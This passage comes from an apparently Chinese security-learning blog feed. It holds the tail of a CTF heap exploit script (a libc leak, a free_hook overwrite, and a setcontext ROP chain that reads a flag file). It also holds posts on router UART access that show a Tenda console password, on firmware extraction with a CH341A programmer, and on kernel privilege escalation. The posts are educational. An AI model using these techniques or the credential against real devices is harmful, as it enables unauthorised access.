class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">">> "</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(size,content):<br> cmd(1)<br> ru(<span class="hljs-string">"Length of game description:"</span>)<br> sl(str(size))<br> ru(<span class="hljs-string">"Game description:"</span>)<br> s(content)<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,content):<br> cmd(3)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"Edit Game description:"</span>)<br> s(content)<br><br>def show(index):<br> cmd(4)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br><br><span class="hljs-built_in">add</span>(0x410,b<span class="hljs-string">'AAAA'</span>)#0<br><span class="hljs-built_in">add</span>(0x10,b<span class="hljs-string">'AAAA'</span>)#1<br>delete(0)<br>show(0)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x3ebca0<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">malloc_hook</span>=libcbase+libc.sym[<span class="hljs-string">'__malloc_hook'</span>]<br><span class="hljs-attribute">free_hook</span>=libcbase+libc.sym[<span class="hljs-string">'__free_hook'</span>]<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+53<br><span class="hljs-attribute">pop_rdi</span>=0x000000000002164f+libcbase<br><span class="hljs-attribute">pop_rsi</span>=0x0000000000023a6a+libcbase<br><span class="hljs-attribute">pop_rdx</span>=0x0000000000001b96+libcbase<br><span class="hljs-attribute">ret</span>=libcbase+0x00000000000008aa<br><br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><br><br><span class="hljs-built_in">add</span>(0x410,b<span class="hljs-string">'AAAA'</span>)#2<br><br><span class="hljs-built_in">add</span>(0x60,b<span class="hljs-string">'AAAA'</span>)#3<br><span class="hljs-built_in">add</span>(0x70,b<span class="hljs-string">'AAAA'</span>)#4<br><span class="hljs-built_in">add</span>(0x70,b<span class="hljs-string">'AAAA'</span>)#5<br><br>delete(3)<br>delete(4)<br>delete(5)<br><br>show(5)<br><span class="hljs-attribute">heapbase</span>=uheap()-0x710<br>lg(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-built_in">edit</span>(3,p64(free_hook))<br><span class="hljs-built_in">add</span>(0x60,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x60,p64(setcontext))#7<br><br><span class="hljs-attribute">heap</span>=heapbase+0x260<br><span class="hljs-attribute">flag_addr</span>=heap+0x300<br><span class="hljs-attribute">orw_addr</span>=heap+0xb0<br><span class="hljs-attribute">orw</span>=p64(pop_rdi)+p64(heap)+p64(pop_rsi)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x50)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x50)+p64(write)<br><span class="hljs-attribute">payload</span>=b'./flag\x00'.ljust(0xa0,b'\x00')<br>payload+=p64(orw_addr)+p64(ret)+orw<br><br><span class="hljs-built_in">edit</span>(2,payload)<br>delete(2)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>Tenda-i6路由器UART调试</title>
<link href="/2023/09/28/Tenda-i6%E8%B7%AF%E7%94%B1%E5%99%A8UART%E8%B0%83%E8%AF%95/"/>
<url>/2023/09/28/Tenda-i6%E8%B7%AF%E7%94%B1%E5%99%A8UART%E8%B0%83%E8%AF%95/</url>
<content type="html"><![CDATA[<h1 id="需要的工具"><a href="#需要的工具" class="headerlink" title="需要的工具"></a>需要的工具</h1><p>万用表、杜邦线(50根公转母,50根母转母)、路由器、TTL转接</p><h1 id="接口介绍"><a href="#接口介绍" class="headerlink" title="接口介绍"></a>接口介绍</h1><p>嵌入式里面说的串口,一般是指UART口。同时还有com口,TTL这些东西,这里简单说一下它们的作用和关系。</p><ul><li>UART:通用异步收发器,在嵌入式里串口其实就是UART口,4个pin</li><li>COM口:在台式机上常用的口,9个pin,接口协议只有两种RS232和RS485</li></ul><p>UART口、COM口指的是物理接口形式,TTL、RS232和RS485指的是电平逻辑标准</p><p>在嵌入式里常用TTL电平即3.3V或者5.0V</p><h1 id="UART接口介绍"><a href="#UART接口介绍" class="headerlink" title="UART接口介绍"></a>UART接口介绍</h1><p>UART只有数据线收和发,并无时钟线,故为异步串行通信接口,可以实现全双工通信;在嵌入式系统中,常用于控制系统与外设通信,包括控制器与控制器,控制器与终端设备。UART至少包含4个引脚公共引脚GND、电源引脚VCC、输出引脚TXD、接收引脚RXD。</p><ul><li><strong>VCC:</strong>供电pin,一般是3.3v,在通电情况下,板子上没有过电保护,这个pin一般不接更安全</li><li><strong>GND:</strong>接地pin,有的时候rx接受数据有问题,就要接上这个pin,一般也可不接 #这里i6只测出了这个接口</li><li><strong>RX:</strong>接收数据pin</li><li><strong>TX:</strong>发送数据pin</li></ul><h1 id="寻找UART并定位"><a href="#寻找UART并定位" class="headerlink" title="寻找UART并定位"></a>寻找UART并定位</h1><p>拆开路由器后看到的正面图</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282015137.png" alt="image-20230928201539907"></p><p>UART口就是下面红圈圈出来的地方</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282017375.jpg" alt="IMG_20230928_201444"></p><h2 id="定位GND"><a href="#定位GND" class="headerlink" title="定位GND"></a>定位GND</h2><p>将万用表扭到蜂鸣档,然后将黑笔接到板子背面的电源焊锡点</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282020018.png" alt="image-20230928202003855"></p><p>红笔放到UART的那四个点那里测试,万用表有响声并且亮红灯的就是GND了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282025553.png" alt="image-20230928202515259"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282026564.jpg" alt="IMG_20230928_202334"></p><h2 id="定位VCC"><a href="#定位VCC" class="headerlink" title="定位VCC"></a>定位VCC</h2><p>将万用表扭到20v然后将黑笔放到刚刚初步判断的GND上,再将红笔在UART其它三个PIN上进行测试,当电压为3.3V左右时则判断红笔的那个PIN为VCC。(记住这里得插着电源测试,包括后面的操作都得插着电源),这里我另外两个口我测出来都是2.29v,一开始以为是误差都一样的,后来问了下z1r0师傅发现这是正常的现象</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282032307.jpg" alt="IMG_20230928_203012"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282032936.jpg" alt="IMG_20230928_203001"></p><h2 id="定位TXD"><a href="#定位TXD" class="headerlink" title="定位TXD"></a>定位TXD</h2><p>开机有数据传输的时候该引脚电压都会发生变化,利用这个特性就可以测试出TXD。因为单手实在操作不了,所以就不贴图了,和上面差不多,黑的放在GND,然后重启路由器,在第二个第三个测试一下即可发现第三个有变化,所以第三个为TXD,这里变化的比较快,但是两个对比一下还是能看出来的,TXD口会先跳到2.7v左右然后才会跳到3.29v,而另外一个口即RXD口会直接跳到3.29v</p><h2 id="定位RXD"><a href="#定位RXD" class="headerlink" title="定位RXD"></a>定位RXD</h2><p>这里第四个口只剩下一个了,剩下的自然就是RXD口了。然后如果是5个的话可以GND和TXD引脚连接到TTL,然后插在电脑上一个一个测试,看一下输入之后有没有回显即可,虽然笨但是很有效。(我一开始没有测出VCC口也是使用的这种方法直接插电脑上测试)</p><h1 id="将杜邦线插入UART口以及TTL转接"><a href="#将杜邦线插入UART口以及TTL转接" class="headerlink" title="将杜邦线插入UART口以及TTL转接"></a>将杜邦线插入UART口以及TTL转接</h1><p>这里需要注意的是路由器上的RXD和TXD需要与TTL上的RX和TX反接,GND要接正确</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282120902.jpg" alt="IMG_20230928_211905"></p><h1 id="获取cli"><a href="#获取cli" class="headerlink" title="获取cli"></a>获取cli</h1><p>这里使用的是secureCRT这个软件,打开之后点左边的session manager,然后点+号添加调试设置,如下图所选即可</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282122648.png" alt="image-20230928212207616"></p><p>这里在试了几次之后确定了波特率是115200,是tenda比较常用的一个波特率</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282122528.png" alt="image-20230928212247500"></p><p>打开之后将TTL转接连上电脑,并且路由器插上电源,就会出现路由器的启动信息</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282125466.png" alt="image-20230928212527436"></p><p>按几下回车之后就会让你输入密码,这里密码是:Fireitup(给z1r0师傅磕两个)</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282126672.png" alt="image-20230928212648642"></p><p>然后就可以想办法利用telnetd将文件传输到本机了</p>]]></content>
</entry>
<entry>
<title>CH341A编程器固件提取</title>
<link href="/2023/09/25/CH341A%E7%BC%96%E7%A8%8B%E5%99%A8%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96/"/>
<url>/2023/09/25/CH341A%E7%BC%96%E7%A8%8B%E5%99%A8%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96/</url>
<content type="html"><![CDATA[<h1 id="工具准备"><a href="#工具准备" class="headerlink" title="工具准备"></a>工具准备</h1><p>准备的工具:</p><ul><li>CH341A编程器</li><li>SOP8测试夹</li><li>转接板</li></ul><p>在淘宝买的,买的时候选择 CH341A编程器+SOP8</p><p>链接:【淘宝】<a href="https://m.tb.cn/h.5fSe8GU?tk=kziqdBrefoZ">https://m.tb.cn/h.5fSe8GU?tk=kziqdBrefoZ</a> CZ0001</p><h1 id="组装"><a href="#组装" class="headerlink" title="组装"></a>组装</h1><p>买过来有下面两个东西</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252054631.png" alt="image-20230925205426499"></p><p>将转接板与CH341A编程器进行连接(注意这里不要插错了)</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252053909.png" alt="image-20230925205317786"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252055888.png" alt="image-20230925205516761"></p><p>这样就已经组装完成了</p><h1 id="CH341A驱动安装"><a href="#CH341A驱动安装" class="headerlink" title="CH341A驱动安装"></a><strong>CH341A驱动安装</strong></h1><p>这里我用的是win10,使用Asprogrammer提取固件的时候会发生报错</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050556.png" alt="Untitled"></p><p>下载下面驱动进行安装</p><p><a href="https://www.wch.cn/downloads/CH341SER_EXE.html">https://www.wch.cn/downloads/CH341SER_EXE.html</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050567.png" alt="Untitled"></p><p>直接点击安装就行,安装完成之后右击计算机,点击管理,然后找到CH341A这个usb设备(记得插到电脑上),右击,点击属性,驱动程序,更新驱动程序,点击浏览我的电脑以查找驱动程序</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252058504.png" alt="image-20230925205800477"></p><p>然后点击让我从计算机上的可用驱动程序列表中选取,找到端口(COM和LPT)<br><a href="http://然后找一下wch.cn/">然后找一下wch.cn</a>,找到对应的CH341A</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050584.png" alt="Untitled"></p><p>然后下一页,继续,好了之后就可以在管理的端口(COM和LPT)里看到对应的CH341A<br>但是还是没有用,接下来点击设置,windows更新,点击查看所有可选更新,<a href="http://找到驱动程序更新里的wch.cn/">找到驱动程序更新里的wch.cn</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252110018.png" alt="image-20230925205813472"></p><p>勾选,然后下载并安装</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050719.png" alt="Untitled"></p><p>安装完成之后就可以在外部接口里看到对应的CH341A<br>至此驱动安装完成</p><h1 id="固件提取"><a href="#固件提取" class="headerlink" title="固件提取"></a><strong>固件提取</strong></h1><p>这里可能还需要准备螺丝刀和翘板来拆路由器</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252057648.png" alt="image-20230925205714576"></p><p>先找flash</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252110694.png" alt="image-20230925211026622"></p><p>然后会发现flash上面有个小圆点,这个对应的是夹子上红线对应的位置,夹上去之后看路由器前面的灯亮不亮</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050384.png" alt="Untitled"></p><p>然后打开Asprogrammer软件,下载地址:<a href="https://github.com/YTEC-info/CH341A-Softwares">https://github.com/YTEC-info/CH341A-Softwares</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050305.png" alt="Untitled"></p><p>点击自动检测,成功后会弹出型号,具体型号可以看flash上有写,随便选一个影响也不是很大,然后点击select IC,再点击read ic</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050718.png" alt="Untitled"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050675.png" alt="Untitled"></p><p>下面的进度条代表正在读取固件</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050747.png" alt="Untitled"></p><p>读取完成之后就可以保存这个固件了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050164.png" alt="Untitled"></p><p>至此固件提取完成</p>]]></content>
</entry>
<entry>
<title>kernel初探</title>
<link href="/2023/09/25/kernel%E5%88%9D%E6%8E%A2/"/>
<url>/2023/09/25/kernel%E5%88%9D%E6%8E%A2/</url>
<content type="html"><![CDATA[<h1 id="kernel"><a href="#kernel" class="headerlink" title="kernel"></a><strong>kernel</strong></h1><p>kernel 也是一个程序,用来管理软件发出的数据 I/O 要求,将这些要求转义为指令,交给 CPU 和计算机中的其他组件处理,kernel 是现代操作系统最基本的部分。<br>kernel 最主要的功能有两点:</p><ol><li>控制并与硬件进行交互</li><li>提供 application 能运行的环境</li></ol><p>包括 I/O,权限控制,系统调用,进程管理,内存管理等多项功能都可以归结到上边两点中。<br>需要注意的是,<strong>kernel 的 crash 通常会引起重启</strong>。</p><p>在pwn中的内核题通常都是提权?通过执行commit_creds(&init_cred)或commit_creds(prepare_kernel_cred(NULL)) 并且最后返回用户态的shell,就取得了root权限。</p><h1 id="Ring-Model"><a href="#Ring-Model" class="headerlink" title="Ring Model"></a><strong>Ring Model</strong></h1><p>intel CPU 将 CPU 的特权级别分为 4 个级别:Ring 0, Ring 1, Ring 2, Ring 3。<br>Ring0 只给 OS 使用,Ring 3 所有程序都可以使用,内层 Ring 可以随便使用外层 Ring 的资源。<br>使用 Ring Model 是为了提升系统安全性,例如某个间谍软件作为一个在 Ring 3 运行的用户程序,在不通知用户的时候打开摄像头会被阻止,因为访问硬件需要使用 being 驱动程序保留的 Ring 1 的方法。<br>大多数的现代操作系统只使用了 Ring 0 和 Ring 3。</p><h1 id="Loadable-Kernel-Modules-LKMs"><a href="#Loadable-Kernel-Modules-LKMs" class="headerlink" title="Loadable Kernel Modules(LKMs)"></a><strong>Loadable Kernel Modules(LKMs)</strong></h1><p>可加载核心模块 (或直接称为内核模块) 就像运行在内核空间的可执行程序,包括:</p><ul><li>驱动程序(Device drivers)<ul><li>设备驱动</li><li>文件系统驱动</li><li>…</li></ul></li><li>内核扩展模块 (modules)</li></ul><p>LKMs 的文件格式和用户态的可执行程序相同,Linux 下为 ELF,Windows 下为 exe/dll,mac 下为 MACH-O,因此我们可以用 IDA 等工具来分析内核模块。<br>模块可以被单独编译,但不能单独运行。它在运行时被链接到内核作为内核的一部分在内核空间运行,这与运行在用户控件的进程不同。<br>模块通常用来实现一种文件系统、一个驱动程序或者其他内核上层的功能。</p><p>在pwn中的kernel题,通常漏洞位于驱动文件即一个xxx.ko文件,这个可以在文件系统中的init文件中详细分析漏洞文件是哪个,以及更改init文件来使自己在qemu模拟时获得root权限来方便后续调试</p><h3 id="相关指令"><a href="#相关指令" class="headerlink" title="相关指令"></a><strong>相关指令</strong></h3><ul><li><strong>insmod</strong>: 讲指定模块加载到内核中</li><li><strong>rmmod</strong>: 从内核中卸载指定模块</li><li><strong>lsmod</strong>: 列出已经加载的模块</li><li><strong>modprobe</strong>: 添加或删除模块,modprobe 在加载模块时会查找依赖关系</li></ul><h1 id="syscall"><a href="#syscall" class="headerlink" title="syscall"></a><strong>syscall</strong></h1><p>系统调用,指的是用户空间的程序向操作系统内核请求需要更高权限的服务,比如 IO 操作或者进程间通信。系统调用提供用户程序与操作系统间的接口,部分库函数(如 scanf,puts 等 IO 相关的函数实际上是对系统调用的封装(read 和 write))。</p><h1 id="ioctl"><a href="#ioctl" class="headerlink" title="ioctl"></a><strong>ioctl</strong></h1><p>直接查看 man 手册</p><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs csharp">NAME<br> ioctl - control device<br><br>SYNOPSIS<br> <span class="hljs-meta">#include <sys/ioctl.h></span><br><br> <span class="hljs-function"><span class="hljs-built_in">int</span> <span class="hljs-title">ioctl</span>(<span class="hljs-params"><span class="hljs-built_in">int</span> fd, unsigned <span class="hljs-built_in">long</span> request, ...</span>)</span>;<br><br><span class="hljs-function">DESCRIPTION</span><br><span class="hljs-function"> The <span class="hljs-title">ioctl</span>() system call manipulates the underlying device parameters of special</span><br><span class="hljs-function"> files. In particular, many operating characteristics of character special</span><br><span class="hljs-function"> <span class="hljs-title">files</span> (<span class="hljs-params">e.g., terminals</span>) may be controlled <span class="hljs-keyword">with</span> <span class="hljs-title">ioctl</span>() requests. The argument</span><br><span class="hljs-function"> fd must be an open file descriptor.</span><br><span class="hljs-function"></span><br><span class="hljs-function"> The second argument <span class="hljs-keyword">is</span> a device-dependent request code. The third argument <span class="hljs-keyword">is</span></span><br><span class="hljs-function"> an untyped pointer to memory. It's traditionally <span class="hljs-built_in">char</span> *<span class="hljs-title">argp</span> (<span class="hljs-params"><span class="hljs-keyword">from</span> the days</span></span><br><span class="hljs-params"><span class="hljs-function"> before <span class="hljs-keyword">void</span> * was valid C</span>), <span class="hljs-keyword">and</span> will be so named <span class="hljs-keyword">for</span> <span class="hljs-keyword">this</span> discussion.</span><br><span class="hljs-function"></span><br><span class="hljs-function"> An <span class="hljs-title">ioctl</span>() request has encoded <span class="hljs-keyword">in</span> it whether the argument <span class="hljs-keyword">is</span> an <span class="hljs-keyword">in</span> parameter <span class="hljs-keyword">or</span></span><br><span class="hljs-function"> <span class="hljs-keyword">out</span> parameter, <span class="hljs-keyword">and</span> the size of the argument argp <span class="hljs-keyword">in</span> bytes. Macros <span class="hljs-keyword">and</span> defines</span><br><span class="hljs-function"> used <span class="hljs-keyword">in</span> specifying an <span class="hljs-title">ioctl</span>() request are located <span class="hljs-keyword">in</span> the file <sys/ioctl.h>.</span><br></code></pre></td></tr></table></figure><p>可以看出 ioctl 也是一个系统调用,用于与设备通信。<br>int ioctl(int fd, unsigned long request, …) 的第一个参数为打开设备 (open) 返回的 <a href="http://m4x.fun/post/play-with-file-descriptor-1/">文件描述符</a>,第二个参数为用户程序对设备的控制命令,再后边的参数则是一些补充参数,与设备有关。</p><h1 id="状态切换"><a href="#状态切换" class="headerlink" title="状态切换"></a><strong>状态切换</strong></h1><h2 id="user-space-to-kernel-space"><a href="#user-space-to-kernel-space" class="headerlink" title="user space to kernel space"></a><strong>user space to kernel space</strong></h2><p>当发生 系统调用,产生异常,外设产生中断等事件时,会发生用户态到内核态的切换,具体的过程为:</p><ol><li>通过 swapgs 切换 GS 段寄存器,将 GS 寄存器值和一个特定位置的值进行交换,目的是保存 GS 值,同时将该位置的值作为内核执行时的 GS 值使用。</li><li>将当前栈顶(用户空间栈顶)记录在 CPU 独占变量区域里,将 CPU 独占区域里记录的内核栈顶放入 rsp/esp。</li><li>通过 push 保存各寄存器值,具体的 <a href="http://elixir.free-electrons.com/linux/v4.12/source/arch/x86/entry/entry_64.S">代码</a> 如下:</li></ol><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs awk">ENTRY(entry_SYSCALL_64)<br> <span class="hljs-regexp">/* SWAPGS_UNSAFE_STACK是一个宏,x86直接定义为swapgs指令 */</span><br> SWAPGS_UNSAFE_STACK<br><br> <span class="hljs-regexp">/* 保存栈值,并设置内核栈 */</span><br> movq %rsp, PER_CPU_VAR(rsp_scratch)<br> movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp<br><br><span class="hljs-regexp">/* 通过push保存寄存器值,形成一个pt_regs结构 */</span><br><span class="hljs-regexp">/* Construct struct pt_regs on stack */</span><br>pushq <span class="hljs-variable">$__USER_DS</span> <span class="hljs-regexp">/* pt_regs->ss */</span><br>pushq PER_CPU_VAR(rsp_scratch) <span class="hljs-regexp">/* pt_regs->sp */</span><br>pushq %r11 <span class="hljs-regexp">/* pt_regs->flags */</span><br>pushq <span class="hljs-variable">$__USER_CS</span> <span class="hljs-regexp">/* pt_regs->cs */</span><br>pushq %rcx <span class="hljs-regexp">/* pt_regs->ip */</span><br>pushq %rax <span class="hljs-regexp">/* pt_regs->orig_ax */</span><br>pushq %rdi <span class="hljs-regexp">/* pt_regs->di */</span><br>pushq %rsi <span class="hljs-regexp">/* pt_regs->si */</span><br>pushq %rdx <span class="hljs-regexp">/* pt_regs->dx */</span><br>pushq %rcx tuichu <span class="hljs-regexp">/* pt_regs->cx */</span><br>pushq $-ENOSYS <span class="hljs-regexp">/* pt_regs->ax */</span><br>pushq %r8 <span class="hljs-regexp">/* pt_regs->r8 */</span><br>pushq %r9 <span class="hljs-regexp">/* pt_regs->r9 */</span><br>pushq %r10 <span class="hljs-regexp">/* pt_regs->r10 */</span><br>pushq %r11 <span class="hljs-regexp">/* pt_regs->r11 */</span><br>sub $(<span class="hljs-number">6</span>*<span class="hljs-number">8</span>), %rsp <span class="hljs-regexp">/* pt_regs->bp, bx, r12-15 not saved */</span><br></code></pre></td></tr></table></figure><ol><li>通过汇编指令判断是否为 x32_abi。</li><li>通过系统调用号,跳到全局变量 sys_call_table 相应位置继续执行系统调用。</li></ol><h2 id="kernel-space-to-user-space"><a href="#kernel-space-to-user-space" class="headerlink" title="kernel space to user space"></a><strong>kernel space to user space</strong></h2><p>退出时,流程如下:</p><ol><li>通过 swapgs 恢复 GS 值</li><li>通过 sysretq 或者 iretq 恢复到用户控件继续执行。如果使用 iretq 还需要给出用户空间的一些信息(CS, eflags/rflags, esp/rsp 等)</li></ol><h1 id="struct-cred"><a href="#struct-cred" class="headerlink" title="struct cred"></a><strong>struct cred</strong></h1><p>之前提到 kernel 记录了进程的权限,更具体的,是用 cred 结构体记录的,每个进程中都有一个 cred 结构,这个结构保存了该进程的权限等信息(uid,gid 等),如果能修改某个进程的 cred,那么也就修改了这个进程的权限。<br><a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">源码</a> 如下:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">struct</span> <span class="hljs-title class_">cred</span> {<br> <span class="hljs-type">atomic_t</span> usage;<br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span><br> <span class="hljs-type">atomic_t</span> subscribers; <span class="hljs-comment">/* number of processes subscribed */</span><br> <span class="hljs-type">void</span> *put_addr;<br> <span class="hljs-type">unsigned</span> magic;<br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CRED_MAGIC 0x43736564</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CRED_MAGIC_DEAD 0x44656144</span><br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> <span class="hljs-type">kuid_t</span> uid; <span class="hljs-comment">/* real UID of the task */</span><br> <span class="hljs-type">kgid_t</span> gid; <span class="hljs-comment">/* real GID of the task */</span><br> <span class="hljs-type">kuid_t</span> suid; <span class="hljs-comment">/* saved UID of the task */</span><br> <span class="hljs-type">kgid_t</span> sgid; <span class="hljs-comment">/* saved GID of the task */</span><br> <span class="hljs-type">kuid_t</span> euid; <span class="hljs-comment">/* effective UID of the task */</span><br> <span class="hljs-type">kgid_t</span> egid; <span class="hljs-comment">/* effective GID of the task */</span><br> <span class="hljs-type">kuid_t</span> fsuid; <span class="hljs-comment">/* UID for VFS ops */</span><br> <span class="hljs-type">kgid_t</span> fsgid; <span class="hljs-comment">/* GID for VFS ops */</span><br> <span class="hljs-type">unsigned</span> securebits; <span class="hljs-comment">/* SUID-less security management */</span><br> <span class="hljs-type">kernel_cap_t</span> cap_inheritable; <span class="hljs-comment">/* caps our children can inherit */</span><br> <span class="hljs-type">kernel_cap_t</span> cap_permitted; <span class="hljs-comment">/* caps we're permitted */</span><br> <span class="hljs-type">kernel_cap_t</span> cap_effective; <span class="hljs-comment">/* caps we can actually use */</span><br> <span class="hljs-type">kernel_cap_t</span> cap_bset; <span class="hljs-comment">/* capability bounding set */</span><br> <span class="hljs-type">kernel_cap_t</span> cap_ambient; <span class="hljs-comment">/* Ambient capability set */</span><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> CONFIG_KEYS</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> jit_keyring; <span class="hljs-comment">/* default keyring to attach requested</span><br><span class="hljs-comment"> * keys to */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">key</span> __rcu *session_keyring; <span class="hljs-comment">/* keyring inherited over fork */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">key</span> *process_keyring; <span class="hljs-comment">/* keyring private to this process */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">key</span> *thread_keyring; <span class="hljs-comment">/* keyring private to this thread */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">key</span> *request_key_auth; <span class="hljs-comment">/* 